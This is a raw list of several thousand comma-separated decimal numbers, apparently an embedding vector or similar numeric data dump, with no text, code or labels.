0.018475227,-0.015501816,0.008976177,-0.0185919,0.0015296657,0.0087383,-0.03211732,-0.019285837,-0.014118086,-0.028767861,0.034564573,0.03055127,-0.0047341064,0.015132269,-0.0022184553,-0.011167149,0.007665319,0.0021603836,0.008176207,0.026541388,0.004636527,0.025377242,0.0126200225,0.00856672,-0.0445418,0.0039053934,0.010176869,0.014835133,-0.011209335,0.020170039,0.010784031,0.006306365,0.011282147,0.005670435,0.013271751,0.012496041,0.016288929,0.03535307,-0.007695785,0.0105557265,0.016628897,-0.0020099732,-0.0162014,0.028728226,0.005512882,0.0046952576,0.034057036,0.022470767,-0.0037219375,-0.010331113,-0.013177183,0.042375572,-0.005561373,0.021593291,-0.019180775,-0.01751708,-0.011163392,-0.002947886,0.086774856,0.007849548,-0.019966789,-0.004734861,0.015978396,0.0051312894,-0.0011102295,0.010672,-0.014675996,0.036401793,-0.009053981,0.0074378783,-0.0007635161,0.025470128,-0.008001222,0.00072672445,0.011972981,0.0066040736,-0.016019689,-0.002297385,0.008269652,-0.010405104,-0.03626769,-0.045448173,0.00334523,0.008740231,0.029013747,0.0059850817,-0.00067513715,0.00040336614,0.0010689356,0.003045584,0.018678343,-0.003708259,-0.0070303218,-0.01114433,-0.00045250295,-0.0076836883,-0.008284149,0.03960424,0.0026047805,-0.0067991773,0.023981875,0.01981035,0.0103684245,-0.008675651,-0.011438672,0.0013355664,-0.005823385,-0.0035381254,-0.013587792,0.0235702,-0.000041200557,0.002916961,-0.0119502675,-0.020600995,-0.0006445565,0.009773396,-0.0062499177,0.0065043224,-0.012675684,0.008170786,-0.029686332,-0.022065142,-0.021228466,-0.002488008,0.0016405211,-0.007226862,-0.008030659,-0.046527136,0.017117942,0.011989467,0.016061235,0.001566234,0.0017627685,0.00096553913,0.014888662,0.013507239,0.021525603,-0.017515266,0.01954357,0.019487446,0.0013772489,-0.017198436,-0.007212312,0.017303806,-0.015552774,0.00779554,-0.009232655,-0.021950733,0.014268361,-0.014804324,0.015951179,0.00015541282,0.0062690335,0.028529786,-0.0039684675,0.00244304,0.001440952,0.019961802,-0.029132036,-0.02034099,-0.0056546503,0.047566157,0.0024685971,0.0010157038,-0.0031992286,-0.007845894,0.00850771,-0.015183516,-0.011670737,-0.07580987,0.021725273,0.020880884,0.020123968,-0.028707301,0.035766523,-0.027699828,-0.0033883285,-0.008478529,-0.018479384,-0.020361647,-0.001894244,0.01763133,0.012579967,0.026960189,0.00475812,-0.013889036,-0.017739376,-0.001494898,-0.058822658,-0.00014717832,0.039252706,0.00795938,0.015863683,0.011749271,0.0007126399,-0.012795229,-0.021605637,0.0034307316,-0.024024157,0.008570964,0.031203033,-0.005537696,-0.011831217,-0.022985574,-0.0054486273,-0.00051064003,0.003725733,-0.0138956895,-0.01494951,0.0020046697,-0.0046031345,-0.01117705,0.010626264,-0.024318729,0.022852613,-0.007572387,0.01396703,0.0073133945,0.039959233,0.02069614,0.004335626,0.017379612,-0.0058504706,0.0066058175,-0.005422402,0.002439165,0.0328323,-0.022526229,-0.007413851,-0.0104817385,0.017211698,0.005979297,-0.0019934129,-0.0053905705,0.0042348923,0.025299547,0.0024737192,0.017751116,0.0008874545,0.023183012,0.01651265,0.007822762,-0.015154001,0.017666003,0.008175461,0.007993872,0.026347263,0.005624127,-0.01569279,-0.003096089,-0.011074081,-0.018842507,0.025546672,0.015157108,-0.009211626,0.025165863,-0.008339816,-0.0030165939,-0.014996373,-0.021294445,-0.0103181405,-0.018623568,-0.0040783146,-0.00061962806,-0.009114034,-0.005789246,-0.03688024,-0.029924605,0.0037758772,0.024334114,-0.019419808,-0.016587159,0.020893084,-0.020824382,-0.0064419373,-0.023083134,-0.0045458865,-0.008965066,0.038021185,-0.016744232,0.016355,0.008726846,-0.011067534,0.0066511766,0.035272993,0.00063653174,-0.008321899,-0.003588783,-0.0206055,-0.00014877407,0.028840473,0.013507216,-0.02805012,0.005460785,0.0010866073,-0.007717099,-0.018097585,-0.0043073483,0.008741036,0.022432042,0.0011144053,-0.017861994,0.019187743,-0.012026494,-0.019787377,0.016214516,-0.039897986,-0.00389758,0.00604447,0.0052719824,0.007607043,0.006446419,-0.008304847,0.049902935,0.017675826,0.0011177195,0.012919547,-0.009619564,0.017476711,0.02299226,0.010829192,-0.01583471,-0.0075752363,-0.014287172,0.023491427,0.00022762733,0.011918137,-0.02080024,-0.029796112,-0.0138638895,-0.015949422,0.0021557643,0.010066607,-0.0022591138,0.007822907,-0.027070438,0.014517297,0.0076816566,0.015037578,0.002345747,-0.021656057,-0.02884531,-0.005219077,0.010010412,-0.024507869,-0.041112818,0.038114373,-0.011337586,-0.004908914,0.02287953,-0.01628328,-0.03419396,-0.0043587754,-0.004793941,0.0074263657,0.029109078,0.0037206034,0.008517214,-0.003696934,0.006727509,-0.002474682,0.010160288,-0.035879396,-0.013435058,0.004741816,-0.0027824962,0.024969645,0.011564713,0.008201594,0.021568809,0.00079249934,-0.02285811,0.011584577,-0.0006979169,-0.014357302,-0.01572413,-0.008212856,0.0057176957,-0.0025625073,0.016392488,-0.013256394,-0.019636791,-0.0018725645,0.02092944,-0.010881906,0.011610643,-0.027954688,-0.01160025,-0.0029967735,0.003807717,-0.018165288,-0.008486257,-0.0011087202,-0.0067371363,-0.011363328,0.014717494,0.017954042,-0.002160583,-0.002509131,-0.029142996,0.005300791,-0.0083012115,-0.033510998,0.014409024,-0.029287007,-0.004051668,0.004342927,0.013030436,0.014055221,0.01003645,-0.0036773314,-0.012101711,-0.004807755,-0.00091426657,0.0054226024,-0.019701822,0.007086977,-0.016976628,-0.0067487145,0.010573691,-0.031002348,0.016288202,-0.023048295,-0.0062744967,0.020880695,-0.020362569,-0.023357974,0.011320621,0.00078399415,0.025824193,0.018286724,-0.009658661,-0.0038430458,0.027418375,-0.009271572,0.03443833,0.013285197,0.007903653,0.02896853,0.008599105,0.028842047,-0.012487781,0.033574164,-0.024053128,-0.027469337,0.0043797065,-0.014669985,0.016225623,-0.015037644,-0.02078954,0.030888528,0.016818067,-0.010985946,0.008750721,-0.021175968,-0.013395384,0.030408747,-0.016164314,-0.002997985,0.00015137705,0.039538376,0.007679919,-0.028840307,0.010403201,0.014988583,-0.067709506,0.028633503,0.006321893,-0.016755454,-0.028390542,0.012874745,-0.0027249206,0.010440313,0.032127302,-0.00512191,0.0064156,-0.006448287,-0.011543912,-0.010206367,-0.0028812117,-0.008447102,-0.0079519255,0.022902526,0.0072481497,0.011551315,-0.018076133,0.00027078294,0.0061656134,0.015159729,0.0026640252,0.0028900092,0.03268448,-0.008566451,-0.03166042,0.023859741,0.006399416,0.010579224,-0.015686631,-0.007292825,0.012235685,-0.013824057,0.0009925815,0.029447895,-0.023430398,0.00036470298,-0.008472316,-0.010685377,-0.025414973,0.034685064,-0.01746883,-0.015350028,0.0104055,-0.036089815,-0.011185453,-0.007300891,0.012973953,-0.013523569,-0.011042077,0.02461563,-0.0057283435,0.009912614,0.02075705,-0.01567959,-0.0023795045,-0.009343202,0.00048390802,-0.007044919,-0.01326063,0.014755351,-0.038824018,-0.013188974,0.0045336834,0.02290869,0.0010102526,-0.00309911,-0.021947544,-0.0049047433,-0.0119261015,0.014435966,-0.008343497,0.020462679,-0.014885479,0.011244596,-0.006755359,-0.0037683977,-0.0017878691,0.002238442,-0.013166141,0.022029337,-0.01973045,0.00023757564,-0.01788457,0.007162892,0.015729303,-0.016922506,-0.023764377,-0.006025573,-0.0027000124,0.002635876,-0.002699954,0.029633503,0.020280296,0.015859095,0.018364863,-0.008357573,-0.0075438167,-0.009933443,-0.012172988,0.018763514,-0.01359369,0.00052456366,-0.007064686,-0.0006735632,0.016011229,0.012226088,-0.006811168,0.012473676,0.004982693,0.018516937,0.040328324,-0.014035777,-0.021486511,0.009209795,0.041066572,0.007357313,0.006270348,-0.011317592,-0.008843451,0.004984571,-0.021064037,-0.0040943976,0.013785398,-0.0064273863,-0.029063648,0.00805482,-0.023728255,0.026684325,-0.002452951,-0.00066124776,0.01357118,-0.011411526,-0.027587866,-0.001998182,-0.006822954,0.013162121,0.0048870193,-0.01537344,0.0018316495,0.001883287,0.009019061,-0.02262082,0.0032915075,0.0020973298,0.0037948552,0.0009035941,0.007979556,0.0016997972,-0.00789457,-0.008546299,-0.008890227,0.011561035,-0.016892193,-0.025907436,-0.010295973,0.031573754,0.0013764553,-0.0027086034,0.012241249,0.0066973604,-0.014479406,-0.000618695,-0.036204565,0.0022778963,-0.040909234,-0.013584525,-0.0018876194,-0.010143797,-0.017158918,0.027540334,0.026668083,-0.0035263414,0.020846138,0.014593327,-0.006544189,-0.017686972,-0.005040977,0.021502046,0.0069324984,0.012873718,0.027552197,-0.0022828395,-0.004693103,0.005060174,-0.03662985,-0.02692393,0.0025624668,0.019428557,-0.00097290124,0.010275018,-0.021601843,0.029367417,-0.014280152,-0.0031302418,-0.01634846,0.0012530944,-0.008592689,0.036316257,0.033479996,-0.00790031,-0.02002841,-0.0067291963,0.008929899,-0.018370496,-0.008329324,-0.009214178,-0.010479445,0.002683194,0.0061333324,-0.0058136284,-0.031144187,-0.019977631,-0.00658785,0.012698441,0.0301718,-0.03285314,0.03097228,-0.012665391,0.019036934,0.00024246509,0.009855881,-0.016151728,0.023896663,-0.007361434,-0.00022327102,-0.008245189,0.018895201,-0.03504804,0.042375896,0.0026536856,-0.0068516033,-0.0040149703,-0.005745,0.0129255885,-0.0039604194,-0.030322287,0.0051804017,0.011890416,0.004420105,-0.010324338,-0.018360028,0.033242058,0.016517108,-0.0007228125,0.0031596983,-0.0137727745,-0.0076450086,0.005633778,-0.00020131488,0.0020783022,-0.0106538525,0.0077864137,0.014747843,0.012056203,-0.020049542,-0.002089506,-0.0035106214,-0.020724893,-0.008874649,-0.00031702657,0.011996045,-0.0076564443,0.006772054,0.00031374357,0.0048751077,-0.015623514,-0.0054036235,-0.014327111,0.019275796,-0.00768687,0.0048466553,-0.006146256,-0.019162912,0.00523476,-0.0007969863,0.022769524,0.007025651,0.0060040527,0.020625502,-0.0223812,0.028315121,0.027923852,0.0027788174,-0.019528503,0.007247875,-0.012125036,0.0038929966,-0.0012925527,-0.00041893887,0.013911002,-0.007203985,0.004015895,0.0061985147,-0.011491009,0.025457704,-0.026754068,0.015798168,-0.0059697004,0.0018169399,-0.017706456,0.02141886,-0.010287012,-0.0032110554,0.020329637,-0.0009120796,-0.018384611,-0.058689643,-0.025426378,0.0059199412,-0.028418886,0.016890876,0.0034815695,0.0025098182,0.0070145433,0.0050576846,0.008168735,0.016047027,0.0084770145,-0.017466428,0.012035195,0.008093345,0.022286333,0.020092884,0.009906312,-0.0012543137,0.0044409386,-0.004050475,-0.018831301,-0.0029114895,0.007254209,-0.019299649,0.008565378,0.031599484,0.013865676,-0.015151967,0.0053430195,0.01001337,-0.021819783,0.07396628,-0.013607255,0.011735918,-0.014156509,0.0028094645,0.01671947,0.0374467,-0.012644656,0.019738931,0.015895486,-0.0012816591,-0.005666324,-0.022790698,0.021281471,-0.00033041713,0.015684698,-0.0046512797,-0.008444075,-0.0007198295,-0.010064773,-0.026345303,0.013409197,0.0016029909,-0.026112746,0.018566282,-0.020773705,0.013222438,-0.0100103365,-0.015414397,-0.027693206,-0.018137295,-0.019581193,0.008759309,0.007225981,0.024740502,-0.0053218743,0.014592685,0.003705103,0.0055590197,-0.038006138,0.026092593,0.0037938044,-0.014926306,0.003142417,0.019972654,0.000011753322,0.06780371,0.016567038,0.018490376,-0.0111980345,0.008942126,0.027710486,-0.015258534,0.011618008,0.011897337,-0.020484826,-0.00008997372,0.012323625,-0.02186493,0.0048161456,0.027146345,0.010354389,0.0036093118,-0.024425648,0.007684996,-0.013079516,-0.0040184245,0.007669222,0.003208098,0.01684775,-0.0017380491,0.018358972,0.0095416615,0.017588926,0.016858118,-0.004738937,-0.0022489035,0.005383294,0.012494292,0.004190704,-0.01342383,-0.05842189,0.009136019,0.16148701,0.011582027,0.015082039,0.0075136926,-0.007974582,-0.005709419,-0.09342592,0.004964703,0.0082585905,0.004911427,0.0023574845,-0.023090286,-0.007267986,-0.0055584195,0.013561941,0.036283195,0.013739792,-0.062426053,0.005944171,-0.011751353,0.010815093,0.0048199277,0.008827476,-0.00072416523,-0.023074599,-0.010644628,0.02170551,-0.009838858,0.003752715,0.0033814965,-0.0041733766,-0.007291512,0.008903436,0.004789138,-0.023597123,0.002524358,0.013757519,0.019622296,0.004227166,-0.010923566,0.00499222,0.028003996,-0.014277087,-0.02259695,-0.13460872,-0.0023498752,0.016131872,-0.030846573,0.031363085,-0.017435819,-0.009953976,-0.015725752,0.012837292,-0.02171937,-0.018120015,0.008436344,-0.0028721164,0.0123120425,-0.0011414721,0.00046585672,-0.0069279997,0.009527601,0.0031172796,-0.0062513063,0.030834813,0.00850821,-0.013882508,-0.026732001,0.005699614,-0.011800779,-0.0031919582,0.026623648,-0.0031876494,0.020196874,-0.020955537,0.01291519,-0.0057927975,0.0018764475,-0.04366679,-0.035597984,-0.0072851,0.0022181915,-0.009704446,-0.020735878,0.0057451907,-0.0013529814,0.015569147,-0.0026525261,0.0028235887,0.038689025,0.0039837677,0.0099705085,0.00016467401,0.01806865,0.01824491,0.003570563,-0.04379539,0.013017132,-0.0075077037,0.006433556,-0.006567951,-0.020828743,-0.020188255,0.015433407,-0.007360848,-0.037281174,-0.004646192,-0.011114773,0.0145875,-0.0073972396,0.0015825431,-0.04608411,-0.0039236797,-0.012396245,0.0093194805,0.010654385,0.017635128,-0.017826509,0.032095253,0.021611657,-0.018242916,-0.0069331876,0.013719007,-0.00921528,-0.0013710547,-0.0025983707,0.0061083552,-0.022171687,-0.0017872002,0.012722079,-0.013376026,-0.015837522,-0.010204969,-0.0006046333,-0.011943221,-0.005054666,0.0130414935,0.016677525,-0.00015922908,0.010832969,0.04451099,0.010907134,-0.027989898,0.005380644,0.015945485,-0.025310917,-0.021481361,0.01532302,-0.017937033,-0.017199684,-0.011358361,-0.019841846,-0.010082946,-0.009601543,-0.016086927,0.0076909317,0.006050801,-0.016932596,-0.038171835,-0.030886607,-0.010091676,0.020876613,0.011411367,0.009096435,-0.01745387,-0.0014166047,0.015699266,0.0075880475,0.04349843,0.0051213526,-0.027113898,-0.006600075,0.015689489,-0.000014401286,-0.01832639,-0.0019232422,-0.005736484,-0.0012149123,0.02868248,0.033640847,-0.0083725285,-0.012821668,-0.04321847,-0.0010880549,0.011097358,-0.022025455,-0.010716588,-0.00072199566,0.036407202,-0.008269566,0.027294125,-0.015556589,-0.0071808235,-0.008395564,-0.0028157467,0.045110118,-0.016343666,0.00853102,0.0022698834,0.08079022,-0.008785612,-0.019573947,-0.010138314,0.006632023,0.0027085727,0.012387383,-0.0011487327,-0.013836274,-0.016419556,-0.026709013,0.00020721613,-0.011419495,-0.016733056,-0.006631758,0.014151681,0.0012969752,0.013238241,-0.005568622,0.005231911,-0.0003946296,0.0039937897,-0.015683731,0.030171836,0.023029702,0.00181348,0.0034800705,0.01506214,-0.0005388089,-0.005935844,-0.025667315,-0.00500914,-0.0040588495,-0.012483368,0.0013772128,-0.03929674,-0.01262823,0.018763157,0.004580608,-0.016213791,0.0037614545,-0.002818699,-0.003124576,-0.017933432,0.016620751,-0.0004480558,-0.029946422,0.01906158,0.015045781,-0.0035255286,0.0012626316,0.040357947,0.0020887393,-0.040094215,-0.01233576,-0.024269918,0.018443445,-0.008517782,-0.004749349,-0.015837993,0.011170366,-0.005558256,-0.028917354,0.0048068473,0.017334837,-0.0009136268,0.021289025,0.007519364,-0.014252207,0.009845125,-0.001418885,-0.00187576,0.0009539378,0.029448029,-0.0013613006,0.012380128,-0.02649269,0.0019361421,-0.011863716,-0.0032352947,0.003724232,-0.001354331,-0.00903027,0.006530933,-0.019296404,-0.06112337,0.011198114,0.019078841,-0.033325084,0.00031622825,-0.013702572,0.009260753,0.040908445,0.008450121,0.014344739,0.019963915,0.026114898,0.004394189,0.010206682,0.0005132356,0.021471146,0.018640622,-0.0101142675,0.0032301918,0.019697305,-0.020905143,-0.0095778415,-0.005112175,0.012476399,-0.017058901,-0.0024059615,0.0022088657,-0.0043770527,-0.019419985,0.008114779,0.044729464,-0.008656596,0.0026734087,0.0155108385,-0.024305599,-0.027469367,-0.0081974,-0.0034743939,-0.009072745,0.03458058,-0.008416326,0.002054092,0.01991464,-0.018863672,0.0070191124,-0.013090831,0.037784334,0.004179157,0.012490477,0.009607397,-0.0032208138,-0.004156153,0.007745301,0.0010733666,-0.0041113542,-0.027938029,-0.0016901572,0.023739293,-0.01851259,-0.013107395,0.010492158,-0.0025808043,-0.0060080015,-0.018814042,0.004137964,-0.0070713717,0.01263183,-0.0011199365,-0.007059746,0.011402084,0.023494707,-0.023037435,-0.017618004,0.00938962,-0.005545595,-0.013836028,0.0044103046,0.011808903,-0.0051963627,-0.023518784,0.016371146,0.029405456,-0.012662053,0.025608137,0.0010567594,-0.009087467,-0.031502265,0.022601008,0.0081298575,-0.017299531,0.0033382871,-0.0041480376,0.007905401,-0.02533495,0.007094578,0.010323051,0.02522117,0.01029608,0.006344153,0.015979951,-0.005059165,-0.0013321153,0.034340765,-0.020178113,0.005196801,-0.018883424,0.026558822,0.004166074,-0.018949507,0.021414962,0.002985942,0.022069992,-0.02268432,0.02342331,0.007145843,-0.002361271,0.054900084,-0.016666893,-0.010330458,-0.0021308614,-0.0069251317,-0.02104966,-0.0066396776,-0.009916028,0.0041524884,-0.021391677,0.0138341505,-0.0003209124,0.0029863575,0.020276057,-0.001101039,0.008185506,0.0033495151,-0.0030397752,-0.016284665,-0.00034148814,-0.007834738,0.019385051,0.013652886,-0.029782243,-0.0018661075,-0.023498025,0.07599265,-0.024433976,-0.03198697,-0.008682225,0.02586948,0.029743768,-0.005614626,0.013056163,-0.034776904,-0.0046510426,-0.0006221866,-0.021813892,0.0037086057,-0.0062885457,0.0063927257,-0.020334778,0.0018078237,-0.0033394918,-0.0006950182,0.0058935676,-0.00989968,-0.0062205046,0.028310236,-0.015543121,-0.020293169,-0.03201579,0.0028697315,0.02160713,-0.025137305,0.016904429,0.008331397,-0.018969035,-0.024960684,-0.015984768,-0.019909788,-0.003865532,0.015983958,-0.007763286,0.0052343775,0.017220521,0.025215764,0.0077483007,0.00030700685,-0.024374245,-0.005037898,-0.027780483,0.035046153,0.009177773,-0.0027893654,0.02257051,-0.008582146,0.0168551,-0.015371193,0.0055914223,0.013599464,0.034275964,-0.0005812635,-0.012219805,0.014698427,0.00038060077,-0.00032320473,-0.03209073,-0.01765049,-0.009870952,0.013792055,0.010020274,-0.004543902,-0.026394239,-0.0024627026,0.0074047046,-0.011050716,0.039287668,0.0025332249,0.013014251,0.010401552,-0.0111692995,0.0146876965,-0.0014792961,0.0055492087,-0.007817803,-0.009840585,0.01255874,-0.026642444,-0.007805124,-0.006048942,-0.005418683,-0.026400605,-0.0035693333,-0.0034934478,-0.0030302396,0.018577576,0.00569894,-0.0196498,-0.017540751,-0.010930654,-0.0018702333,0.00443256,0.011185735,0.005507188,-0.023190035,0.0003194526,-0.0026047411,0.0046458426,0.0049144863,0.0139042,-0.02226776,-0.06827967,0.018823626,-0.011488706,-0.01963287,-0.007591339,-0.022559956,0.016319547,0.07025182,0.010634592,-0.034348875,-0.0010593467,0.02678535,-0.0043277494,-0.0077720736,-0.0071375202,-0.0017030083,0.005406842,-0.015611969,-0.012352707,0.010140576,0.007193883,0.009574704,-0.005459637,-0.021607123,0.016218496,0.010954306,-0.0039796387,0.008578165,0.016557321,0.019823207,0.0012988927,0.0043633715,0.0065627256,0.0075810254,0.0030936615,0.012392354,-0.0036460522,0.017941838,0.003544304,-0.0050442717,0.0007735455,-0.03109036,-0.0028860183,0.023000274,-0.007928804,0.0052647116,0.010078458,0.016676523,0.008452444,-0.0028021787,-0.02410704,-0.00036896748,0.032534912,0.009333487,-0.005144326,0.013185397,-0.01847035,0.023122057,0.00069827534,-0.008376293,0.007166017,0.03355766,0.0025164923,-0.013955748,0.004287094,0.0035436526,-0.0018070185,0.002296202,-0.030588591,-0.004614476,-0.015097547,-0.0011449679,-0.0032728175,0.0014971311,-0.0058799456,-0.019539705,0.029489517,0.016972823,0.016558101,-0.00538397,-0.015576381,-0.017527642,-0.0039695306,-0.0011834884,0.011871386,0.005077323,-0.009544688,0.011790815,-0.0013377387,0.006717649,0.007995111,0.01450864,-0.010410123,-0.018868761,0.014216816,0.024991283,-0.015993139,0.014450955,0.0011319703,-0.0026231625,0.0034888159,0.0077418215,-0.0060089207,-0.019841362,-0.10497866,-0.009592001,0.018563617,-0.0013158995,-0.016110152,-0.0066414787,0.00907571,0.0024419576,0.0018512838,-0.014956496,-0.022469044,0.022371143,0.006891447,-0.0052059586,0.0052628377,0.021975601,-0.02280636,0.0033568784,0.00721259,0.004465763,-0.00056659535,-0.008959538,-0.02987861,-0.0100573655,0.011116768,0.011975637,0.0045486363,0.007821462,0.032853905,-0.011234189,-0.0041212174,0.027071962,-0.008687294,0.02531759,-0.0028490403,-0.025077218,0.0062973034,0.023166336,-0.0017084111,0.013466509,0.00819362,-0.0065837153,0.007832024,0.0017133078,-0.00046143818,0.011222483,-0.008811972,0.008783818,-0.0001638091,0.010326409,-0.004993763,-0.0020091615,-0.003866302,0.010583599,-0.0144240875,-0.0108840475,-0.013001501,0.0074469806,0.002395067,0.0055121975,-0.0036787414,0.0137351975,-0.023471447,-0.0039228657,0.006633576,0.035611156,-0.0027180577,-0.012374536,0.0125883175,0.0068348534,-0.01680027,0.008707175,0.016268518,0.0013181466,0.01969539,-0.001399868,0.012223217,0.032580435,0.0067516426,-0.003099277,0.009488787,-0.007813157,-0.0043878527,0.00006328453,-0.020686587,-0.01517902,-0.015504535,0.007416325,-0.00706837,0.017538013,-0.0013926431,0.01378995,-0.012054797,0.0047347466,0.013792526,-0.0045469105,0.017678281,0.016576117,-0.009258297,-0.0053898995,-0.048080076,-0.00032661716,-0.011180762,0.026214538,-0.011038464,0.022586484,-0.0073898304,-0.006752885,0.0017728526,0.0018211567,0.014889999,0.020871175,-0.007404727,0.014532152,-0.00094635907,-0.012301856,-0.014984813,-0.010210693,0.0011107746,-0.006248499,0.023718953,0.008455828,-0.0023986476,-0.03318951,-0.018582527,0.009741851,-0.021294745,0.023425588,0.018132817,0.0043942523,0.011118288,0.00449744,0.018699428,-0.026444664,0.007440524,0.005584801,-0.009985805,-0.010394063,0.013015374,0.025332494,0.014568045,-0.03973235,0.023138205,-0.00043560503,-0.016565742,-0.007864595,0.007330459,0.026757188,-0.02172702,0.021092942,-0.008578087,-0.009341389,0.021267261,-0.009532743,-0.005849764,0.0032198115,-0.019992579,-0.009304944,0.0017318283,0.0034175066,-0.01523416,0.023244467,-0.010109744,0.015411989,0.00087089045,-0.013571967,0.0014325426,0.0068503893,-0.00093581824,-0.018527133,0.0054427492,-0.011208211,0.036428604,-0.003431751,0.007502414,0.024126366,0.02437949,0.031328008,0.004339972,0.022626018,0.017704794,-0.000637763,-0.007766109,-0.0067538004,0.029213767,0.008907536,0.019102758,0.006427429,-0.006402579,0.019624619,0.0017172936,-0.016440999,-0.04312608,0.0031844224,0.016962077,-0.01751699,-0.0026375642,-0.0043773125,0.025718303,-0.015712589,-0.008540672,0.020132832,0.015271172,-0.008348743,-0.0077700866,-0.0006134006,0.0012396273,0.02887421,0.021154504,-0.006498616,-0.009137783,-0.024921862,-0.0031205295,-0.0021570628,0.00025491216,0.03451555,0.0077551217,-0.018272882,0.012978273,0.0045374176,0.016284289,-0.006184383,0.009394539,-0.013150658,0.009124035,0.007772802,0.0032882488,-0.0012459505,-0.017688047,-0.015585029,-0.00062070723,0.017732715,-0.01846027,0.007862183,0.0005813887,0.007956732,0.014947781,-0.0137938075,-0.012463496,0.0047376934,0.0010255259,0.01741677,0.025854854,0.020330897,0.0015215533,-0.0118501,0.023401553,-0.008073631,0.015922412,0.02323726,0.018193278,-0.013045988,-0.013860663,0.002253519,-0.029383833,-0.0016541505,0.017095933,0.008581,-0.014591143,-0.00012890567,0.0029025683,-0.01718688,-0.050680548,0.0055791903,0.014938864,-0.009206512,0.020121459,-0.041387595,-0.007953031,0.0028175141,0.009997698,0.01482361,-0.0022377078,0.011942984,0.015682135,-0.0107675595,-0.040447045,-0.01379081,0.011066846,0.0051787654,-0.013312437,-0.030854646,-0.0062162583,-0.0074215047,0.014888025,-0.016769107,-0.011344703,0.001990248,-0.02026324,-0.011068545,0.00898003,-0.006053408,0.009682123,-0.03138451,-0.027371356,0.0016566847,0.019856688,-0.015121847,0.0058951546,-0.0041104793,0.0006946794,-0.010287275,0.00798729,0.005824806,0.004200463,-0.018268164,-0.003294392,0.0077465083,-0.0009228064,0.0054274253,-0.0022509769,0.0060143843,-0.016053556,0.018023515,0.015971655,-0.012747664,-0.0073923743,0.008869294,-0.00678459,-0.009377688,-0.009341662,-0.024369618,0.0074651535,0.006058489,0.0031093096,-0.0027946031,0.009010797,0.02387787,-0.01068769,0.010513429,0.02185659,0.017558139,-0.0007280236,-0.025640389,-0.00003884308,-0.016339038,0.011188895,0.023073865,0.016276736,0.00642011,0.008797685,-0.002065049,-0.005382029,-0.012058016,-0.006662081,-0.003190076,0.012190583,-0.011415044,0.025963496,-0.0047828015,-0.007425073,-0.017065685,0.010615816,0.025297627,0.014369897,0.002404327,-0.008852622,0.014902365,0.000992887,0.0290557,-0.009019109,0.008910152,0.006720375,0.0025539517,0.0010678517,-0.0026215208,0.009250121,0.01892146,-0.016712232,-0.018174598,-0.0032172287,-0.009769624,-0.020203575,-0.011902316,-0.007574241,-0.09459187,0.020082397,0.0044836192,-0.008232306,0.029715983,0.006660158,-0.016265986,0.019409802,0.014318209,0.0020155911,-0.010272179,0.001379549,-0.000558334,0.0076806033,0.023733526,-0.005411483,0.014461647,-0.006299102,-0.0076083257,-0.012511537,-0.00751198,0.022099404,-0.021508826,-0.012068267,0.0147668235,-0.011194144,-0.02016814,0.001908647,0.00037826988,0.015775746,-0.00072439533,0.0068421345,0.00574133,-0.0306868,-0.010533778,0.005043507,0.010571984,0.010992159,0.01166807,-0.034965396,-0.014988449,0.017560065,0.0063120364,-0.005112583,-0.0061525544,0.019658908,-0.026794448,-0.020273732,-0.027146516,-0.01405959,0.017041223,0.014905361,-0.043339636,0.026755296,0.0038068292,0.0072533437,0.0091692405,0.007438786,0.034365073,-0.000039354076,-0.008909292,-0.0022086147,0.016208671,-0.015008757,-0.013003732,0.012685822,-0.00038001864,0.013401988,0.009926049,0.029681267,-0.00046984898,-0.025939904,-0.022722332,0.0009952795,-0.01039111,0.026434813,-0.024924487,-0.0013218895,0.00048381466,0.0007337687,-0.013597386,-0.015573237,0.0027295947,0.0018702759,0.0037282808,-0.005264434,-0.02516257,-0.0017688713,0.028639734,0.010658131,-0.00573771,0.008119067,0.012397454,0.0016573628,-0.0041906876,0.014872239,-0.0021496462,-0.0107590845,0.01441804,0.016911391,-0.029032258,0.0070263036,0.0112643335,-0.013315688,0.003281502,-0.002549063,-0.0034395377,-0.0063963765,0.006959632,0.0075119883,-0.0012844052,0.017571311,0.025740918,0.011567372,0.030558288,0.017363947,0.005325408,-0.0030827844,-0.031005066,-0.018750904,-0.016868781,-0.019849742,-0.018556546,0.0054168864,0.0054271375,0.0044242623,-0.0031194754,-0.014090177,-0.024517518,0.020663211,-0.019141736,0.017149875,0.022967031,0.026263965,0.012222901,-0.0051030214,-0.009108168,-0.0015250726,-0.0041942173,-0.0067681437,0.00086752657,-0.053740922,0.013956577,0.008183793,-0.009361612,0.049564406,-0.0061721634,-0.0043981597,0.016389834,0.005895802,0.013044121,-0.0078553585,-0.004202143,-0.015256546,-0.0075210086,-0.0026440325,0.016068226,0.0008564754,0.0057539726,-0.023241173,-0.0009095204,0.01598634,0.009180367,0.0027554508,-0.0070431246,0.00083960674,-0.011034594,-0.004755231,-0.009816121,-0.027468221,-0.0133733,0.0063432916,0.01000908,-0.011169263,-0.025466142,0.0040938207,0.00013988174,0.008388897,-0.00042922885,-0.014268813,-0.013258887,-0.0015336876,0.00995549,0.004086649,-0.008275306,0.0091980565,-0.012847756,-0.0005647694,0.012826439,-0.026507754,-0.004890988,0.008692043,-0.006680105,0.008141271,-0.0070283674,-0.023552405,-0.00036927027,-0.0018136594,-0.023500033,0.016987529,-0.030033156,-0.007913811,-0.003066521,-0.0048237606,0.023532335,0.0314481,-0.013536381,-0.010098768,0.013221933,0.009933591,0.022111652,-0.008815823,-0.000022690565,0.078659005,0.014535872,-0.017241567,0.0029641152,-0.0077848877,0.0035651682,0.024240354,-0.010889483,0.0005071933,0.0038668052,0.012430532,-0.013747067,0.0051717414,-0.018226147,-0.029443007,0.02351554,0.014250991,-0.014401512,-0.0022672182,-0.0203567,-0.0076117325,-0.02636662,-0.005213556,0.011373272,0.0058550145,-0.04179561,0.012790467,0.03899836,-0.008421727,0.01125291,-0.0023741564,0.02748978,0.030967632,0.0058169253,-0.028147195,-0.013219977,0.007413182,-0.013787329,-0.0012596089,0.011292608,0.0012141372,0.019992316,-0.01066708,-0.014007228,-0.047591116,0.00013727571,0.025842397,0.013980645,0.007628297,-0.0058235135,0.005921421,0.0058030523,0.022573756,-0.00041408886,0.018488988,0.002212285,0.0049476177,-0.010492957,0.0048485813,-0.0051967315,0.03332952,0.000874116,-0.0023285698,0.010935916,0.026169844,-0.005905705,-0.0042494796,-0.012595987,-0.025399096,-0.012850818,0.028485347,-0.0062212762,0.0012383704,0.02271295,-0.0066763335,0.04170249,-0.016134843,-0.03423418,0.008785552,-0.0342636,0.011449673,0.0100024445,-0.0028942018,0.009523916,0.01318352,0.0051350677,-0.0006328757,0.0422344,0.0076849423,-0.0036404543,0.0022373502,0.013400735,-0.007881378,0.00050438655,-0.011895951,0.008360335,0.036278408,-0.01238209,-0.002020437,0.0037940738,0.002500289,0.0